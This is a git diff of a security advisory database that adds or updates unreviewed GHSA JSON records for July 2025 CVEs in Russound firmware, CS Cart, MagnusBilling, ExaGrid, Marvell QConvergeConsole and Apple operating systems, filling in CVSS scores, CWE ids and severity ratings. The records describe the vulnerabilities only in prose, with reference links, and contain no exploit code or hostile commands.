a/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json +++ b/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hc9q-xqxq-qjr5", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T18:32:03Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-50475" ], "details": "An OS command injection vulnerability exists in Russound MBX-PRE-D67F firmware version 3.1.6, allowing unauthenticated attackers to execute arbitrary commands as root via crafted input to the hostname parameter in network configuration requests. This vulnerability stems from improper neutralization of special elements used in an OS command within the network configuration handler, enabling remote code execution with the highest privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json b/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json new file mode 100644 index 0000000000000..904278c7ead18 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hq48-r775-f9j2", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-50867" + ], + "details": "A SQL Injection vulnerability exists in the takeassessment2.php endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST parameter is directly embedded in SQL statements without sanitization.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50867" + }, + { + "type": "WEB", + "url": "https://github.com/SacX-7/CVE-2025-50867" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json b/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json new file mode 100644 index 0000000000000..c25e8113b8d1e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j927-gjfr-7859", + "modified": "2025-07-31T18:32:03Z", + "published": "2025-07-31T18:32:03Z", + "aliases": [ + "CVE-2025-50847" + ], + "details": "Cross Site Request Forgery (CSRF) vulnerability in CS Cart 4.18.3, allows attackers to add products to a user's comparison list via a crafted HTTP request.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50847" + }, + { + "type": "WEB", + "url": "https://github.com/hackerwahab/CS-Cart-Vulns/blob/main/CVE-2025-50847.md" + }, + { + "type": "WEB", + "url": "http://cs.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jgfh-9r2w-fcrh/GHSA-jgfh-9r2w-fcrh.json b/advisories/unreviewed/2025/07/GHSA-jgfh-9r2w-fcrh/GHSA-jgfh-9r2w-fcrh.json new file mode 100644 index 0000000000000..c9b62dfeb1f76 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jgfh-9r2w-fcrh/GHSA-jgfh-9r2w-fcrh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgfh-9r2w-fcrh", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-8426" + ], + "details": "Marvell QConvergeConsole compressConfigFiles Directory Traversal Information Disclosure and Denial-of-Service Vulnerability. This vulnerability allows remote attackers to disclose sensitive information or to create a denial-of-service condition on affected installations of Marvell QConvergeConsole. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the compressConfigFiles method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information or to create a denial-of-service condition on the system. Was ZDI-CAN-24915.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8426" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-733" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json b/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json index 2a1c46a3f86c9..42814116b4372 100644 --- a/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json +++ b/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jgfv-5w6w-r347", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T18:32:03Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-52289" ], "details": "A Broken Access Control vulnerability in MagnusBilling v7.8.5.3 allows newly registered users to gain escalated privileges by sending a crafted request to /mbilling/index.php/user/save to set their account status fom \"pending\" to \"active\" without requiring administrator approval.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:37Z" diff --git a/advisories/unreviewed/2025/07/GHSA-mh5r-54wv-3957/GHSA-mh5r-54wv-3957.json b/advisories/unreviewed/2025/07/GHSA-mh5r-54wv-3957/GHSA-mh5r-54wv-3957.json index 7a5d3d9932f9b..512b71f90c6cf 100644 --- a/advisories/unreviewed/2025/07/GHSA-mh5r-54wv-3957/GHSA-mh5r-54wv-3957.json +++ b/advisories/unreviewed/2025/07/GHSA-mh5r-54wv-3957/GHSA-mh5r-54wv-3957.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mh5r-54wv-3957", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43225" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.6, iPadOS 17.7.9, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-p92p-vw5f-568g/GHSA-p92p-vw5f-568g.json b/advisories/unreviewed/2025/07/GHSA-p92p-vw5f-568g/GHSA-p92p-vw5f-568g.json index a87380528ae68..13634953af2a9 100644 --- a/advisories/unreviewed/2025/07/GHSA-p92p-vw5f-568g/GHSA-p92p-vw5f-568g.json +++ b/advisories/unreviewed/2025/07/GHSA-p92p-vw5f-568g/GHSA-p92p-vw5f-568g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p92p-vw5f-568g", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43221" ], "details": "An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Sequoia 15.6, iOS 18.6 and iPadOS 18.6, visionOS 2.6, tvOS 18.6. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-p9p4-h5gm-3hf5/GHSA-p9p4-h5gm-3hf5.json b/advisories/unreviewed/2025/07/GHSA-p9p4-h5gm-3hf5/GHSA-p9p4-h5gm-3hf5.json new file mode 100644 index 0000000000000..de6f5a31f0482 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p9p4-h5gm-3hf5/GHSA-p9p4-h5gm-3hf5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9p4-h5gm-3hf5", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-54833" + ], + "details": "OPEXUS FOIAXpress Public Access Link (PAL) version v11.1.0 allows attackers to bypass account-lockout and CAPTCHA protections. Unauthenticated remote attackers can more easily brute force passwords.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54833" + }, + { + "type": "WEB", + "url": "https://docs.opexustech.com/docs/foiaxpress/11.12.0/FOIAXpress_Release_notes_11.12.3.0.pdf" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-174-01.json" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-54833" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pc8j-gfwh-489w/GHSA-pc8j-gfwh-489w.json b/advisories/unreviewed/2025/07/GHSA-pc8j-gfwh-489w/GHSA-pc8j-gfwh-489w.json index 0349412dfddd5..db02f0953f4f8 100644 --- a/advisories/unreviewed/2025/07/GHSA-pc8j-gfwh-489w/GHSA-pc8j-gfwh-489w.json +++ b/advisories/unreviewed/2025/07/GHSA-pc8j-gfwh-489w/GHSA-pc8j-gfwh-489w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc8j-gfwh-489w", - "modified": "2025-07-30T00:32:21Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43193" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.6, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. An app may be able to cause a denial-of-service.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:32Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pcpc-22gx-2w2v/GHSA-pcpc-22gx-2w2v.json b/advisories/unreviewed/2025/07/GHSA-pcpc-22gx-2w2v/GHSA-pcpc-22gx-2w2v.json index 5f3c73ed2f87a..77103f326ca9d 100644 --- a/advisories/unreviewed/2025/07/GHSA-pcpc-22gx-2w2v/GHSA-pcpc-22gx-2w2v.json +++ b/advisories/unreviewed/2025/07/GHSA-pcpc-22gx-2w2v/GHSA-pcpc-22gx-2w2v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pcpc-22gx-2w2v", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43241" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. An app may be able to read files outside of its sandbox.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pgmc-x6p4-6hf7/GHSA-pgmc-x6p4-6hf7.json b/advisories/unreviewed/2025/07/GHSA-pgmc-x6p4-6hf7/GHSA-pgmc-x6p4-6hf7.json index d7883544e4c61..ae6b936675216 100644 --- a/advisories/unreviewed/2025/07/GHSA-pgmc-x6p4-6hf7/GHSA-pgmc-x6p4-6hf7.json +++ b/advisories/unreviewed/2025/07/GHSA-pgmc-x6p4-6hf7/GHSA-pgmc-x6p4-6hf7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pgmc-x6p4-6hf7", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43248" ], "details": "A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7. A malicious app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pj5p-695q-ppg6/GHSA-pj5p-695q-ppg6.json b/advisories/unreviewed/2025/07/GHSA-pj5p-695q-ppg6/GHSA-pj5p-695q-ppg6.json index 57c087da803bf..c9cd59c62f0f8 100644 --- a/advisories/unreviewed/2025/07/GHSA-pj5p-695q-ppg6/GHSA-pj5p-695q-ppg6.json +++ b/advisories/unreviewed/2025/07/GHSA-pj5p-695q-ppg6/GHSA-pj5p-695q-ppg6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-434" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json b/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json index 95485235f70c9..f5e7e1d0b7a93 100644 --- a/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json +++ b/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pp44-53wg-rwwx", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T18:32:03Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-50849" ], "details": "CS Cart 4.18.3 is vulnerable to Insecure Direct Object Reference (IDOR). The user profile functionality allows enabling or disabling stickers through a parameter (company_id) sent in the request. However, this operation is not properly validated on the server side. An authenticated user can manipulate the request to target other users' accounts and toggle the sticker setting by modifying the company_id or other object identifiers.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pqr9-jhfg-m7q3/GHSA-pqr9-jhfg-m7q3.json b/advisories/unreviewed/2025/07/GHSA-pqr9-jhfg-m7q3/GHSA-pqr9-jhfg-m7q3.json index f048de376bdf6..e5b867b7f1a9d 100644 --- a/advisories/unreviewed/2025/07/GHSA-pqr9-jhfg-m7q3/GHSA-pqr9-jhfg-m7q3.json +++ b/advisories/unreviewed/2025/07/GHSA-pqr9-jhfg-m7q3/GHSA-pqr9-jhfg-m7q3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pqr9-jhfg-m7q3", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43254" ], "details": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Sequoia 15.6, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. Processing a maliciously crafted file may lead to unexpected app termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:37Z" diff --git a/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json b/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json new file mode 100644 index 0000000000000..1d4fe142dff88 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4xj-79jm-5gwm", + "modified": "2025-07-31T18:32:03Z", + "published": "2025-07-31T18:32:03Z", + "aliases": [ + "CVE-2025-29556" + ], + "details": "ExaGrid EX10 6.3 - 7.0.1.P08 is vulnerable to Incorrect Access Control. Since version 6.3, ExaGrid enforces restrictions preventing users with the Admin role from creating or modifying users with the Security Officer role without approval. However, a flaw in the account creation process allows an attacker to bypass these restrictions via API request manipulation. An attacker with an Admin access can intercept and modify the API request during user creation, altering the parameters to assign the new account to the ExaGrid Security Officers group without the required approval.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29556" + }, + { + "type": "WEB", + "url": "https://github.com/0xsu3ks/CVE-2025-29556" + }, + { + "type": "WEB", + "url": "https://www.exagrid.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q545-9wcw-vwf9/GHSA-q545-9wcw-vwf9.json b/advisories/unreviewed/2025/07/GHSA-q545-9wcw-vwf9/GHSA-q545-9wcw-vwf9.json index 329741be70d10..2a3e6eca2bf52 100644 --- a/advisories/unreviewed/2025/07/GHSA-q545-9wcw-vwf9/GHSA-q545-9wcw-vwf9.json +++ b/advisories/unreviewed/2025/07/GHSA-q545-9wcw-vwf9/GHSA-q545-9wcw-vwf9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q545-9wcw-vwf9", - "modified": "2025-07-30T00:32:21Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43192" ], "details": "A configuration issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7. Account-driven User Enrollment may still be possible with Lockdown Mode turned on.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:32Z" diff --git a/advisories/unreviewed/2025/07/GHSA-qh68-q24j-hfmf/GHSA-qh68-q24j-hfmf.json b/advisories/unreviewed/2025/07/GHSA-qh68-q24j-hfmf/GHSA-qh68-q24j-hfmf.json index 4ed54446fe425..d810be17e304a 100644 --- a/advisories/unreviewed/2025/07/GHSA-qh68-q24j-hfmf/GHSA-qh68-q24j-hfmf.json +++ b/advisories/unreviewed/2025/07/GHSA-qh68-q24j-hfmf/GHSA-qh68-q24j-hfmf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qh68-q24j-hfmf", - "modified": "2025-07-30T00:32:19Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:19Z", "aliases": [ "CVE-2025-31243" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.7.7, macOS Ventura 13.7.7, macOS Sequoia 15.6. An app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v3q5-xfqm-wpf2/GHSA-v3q5-xfqm-wpf2.json b/advisories/unreviewed/2025/07/GHSA-v3q5-xfqm-wpf2/GHSA-v3q5-xfqm-wpf2.json index 248121b395dce..0be73ffa89b54 100644 --- a/advisories/unreviewed/2025/07/GHSA-v3q5-xfqm-wpf2/GHSA-v3q5-xfqm-wpf2.json +++ b/advisories/unreviewed/2025/07/GHSA-v3q5-xfqm-wpf2/GHSA-v3q5-xfqm-wpf2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v3q5-xfqm-wpf2", - "modified": "2025-07-30T00:32:19Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:19Z", "aliases": [ "CVE-2025-31229" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in iOS 18.6 and iPadOS 18.6. Passcode may be read aloud by VoiceOver.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-261" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v9hg-gx5f-3cpp/GHSA-v9hg-gx5f-3cpp.json b/advisories/unreviewed/2025/07/GHSA-v9hg-gx5f-3cpp/GHSA-v9hg-gx5f-3cpp.json index 4df7291ba3bd9..5dafee1feca6a 100644 --- a/advisories/unreviewed/2025/07/GHSA-v9hg-gx5f-3cpp/GHSA-v9hg-gx5f-3cpp.json +++ b/advisories/unreviewed/2025/07/GHSA-v9hg-gx5f-3cpp/GHSA-v9hg-gx5f-3cpp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v9hg-gx5f-3cpp", - "modified": "2025-07-30T00:32:20Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-31279" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6, iPadOS 17.7.9, macOS Sonoma 14.7.7, macOS Ventura 13.7.7. An app may be able to fingerprint the user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-vch4-7x67-5j92/GHSA-vch4-7x67-5j92.json b/advisories/unreviewed/2025/07/GHSA-vch4-7x67-5j92/GHSA-vch4-7x67-5j92.json index f97618bc9c19a..05870a52a78e7 100644 --- a/advisories/unreviewed/2025/07/GHSA-vch4-7x67-5j92/GHSA-vch4-7x67-5j92.json +++ b/advisories/unreviewed/2025/07/GHSA-vch4-7x67-5j92/GHSA-vch4-7x67-5j92.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vch4-7x67-5j92", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43220" ], "details": "This issue was addressed with improved validation of symlinks. This issue is fixed in iPadOS 17.7.9, macOS Sequoia 15.6, macOS Sonoma 14.7.7, macOS Ventura 13.7.7. An app may be able to access protected user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-59" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-vfcq-438j-fxwg/GHSA-vfcq-438j-fxwg.json b/advisories/unreviewed/2025/07/GHSA-vfcq-438j-fxwg/GHSA-vfcq-438j-fxwg.json new file mode 100644 index 0000000000000..7ba436fcb7d5b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vfcq-438j-fxwg/GHSA-vfcq-438j-fxwg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfcq-438j-fxwg", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-8409" + ], + "details": "A vulnerability has been found in code-projects Vehicle Management 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /filter.php. The manipulation of the argument from leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8409" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.624011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + 